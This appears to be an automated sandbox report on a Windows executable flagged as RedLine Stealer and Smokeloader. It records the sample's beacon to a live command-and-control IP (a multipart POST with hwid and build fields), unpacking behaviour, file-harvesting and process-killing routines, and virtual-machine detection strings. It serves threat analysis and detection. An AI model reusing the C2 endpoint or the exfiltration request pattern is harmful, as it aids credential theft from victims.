HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.88Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /7bbacc20a3bd2eb5.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 92.255.57.88Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 36 39 39 38 44 43 33 30 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="hwid"376998DC30231817704571------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="build"551488411------ECBKKKFHCFIDHIECGCAF--

Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.php
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpV
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpj
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpq
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpw#
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.88/X
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.883
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00409770 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00409770

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00834D27

0_2_00834D27

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: String function: 00404A60 appears 317 times

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1076

Source: X4roU7TtF1.exe, 00000000.00000000.2105383986.0000000000465000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesio@ vs X4roU7TtF1.exe
Source: X4roU7TtF1.exe	Binary or memory string: OriginalFilenamesOdilesio@ vs X4roU7TtF1.exe

Source: X4roU7TtF1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_004248B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

0_2_004248B0

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_0082CF29 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_0082CF29

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\0Z81F0BW.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2528

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\59b189f3-b232-40d6-9983-733db2751c0d

Jump to behavior

Source: X4roU7TtF1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\X4roU7TtF1.exe "C:\Users\user\Desktop\X4roU7TtF1.exe"
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1076

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Unpacked PE file: 0.2.X4roU7TtF1.exe.400000.0.unpack .text:ER;.data:W;.dipo:R;.puwuxu:R;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Unpacked PE file: 0.2.X4roU7TtF1.exe.400000.0.unpack

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_004268F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004268F0

Source: X4roU7TtF1.exe	Static PE information: section name: .dipo
Source: X4roU7TtF1.exe	Static PE information: section name: .puwuxu

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0076CA5F push ebx; iretd	0_2_0076CA79
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_007682E8 push ebx; ret	0_2_00768365
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00769303 push 00000032h; retf	0_2_00769305
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0076A3E7 pushad ; iretd	0_2_0076A3E8
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00837D0C push ecx; ret	0_2_00837D1F

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

0_2_004268F0

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

API coverage: 3.3 %

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00823CD7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00823CD7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082D037 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_0082D037
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00821C57 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_00821C57
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082D987 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_0082D987
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082E187 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	0_2_0082E187
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0081DDE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_0081DDE7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00811907 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_00811907
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00811920 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	0_2_00811920
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00824ED7 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00824ED7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00824EF0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	0_2_00824EF0
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00821607 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00821607
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00821620 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00821620
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082E657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_0082E657

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00421DC0 EntryPoint,GetSystemInfo,GetUserDefaultLangID,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,OpenEventA,CreateEventA,

0_2_00421DC0

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000964000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000964000.00000004.00000020.00020000.00000000.sdmp, X4roU7TtF1.exe, 00000000.00000002.2192848328.000000000092F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
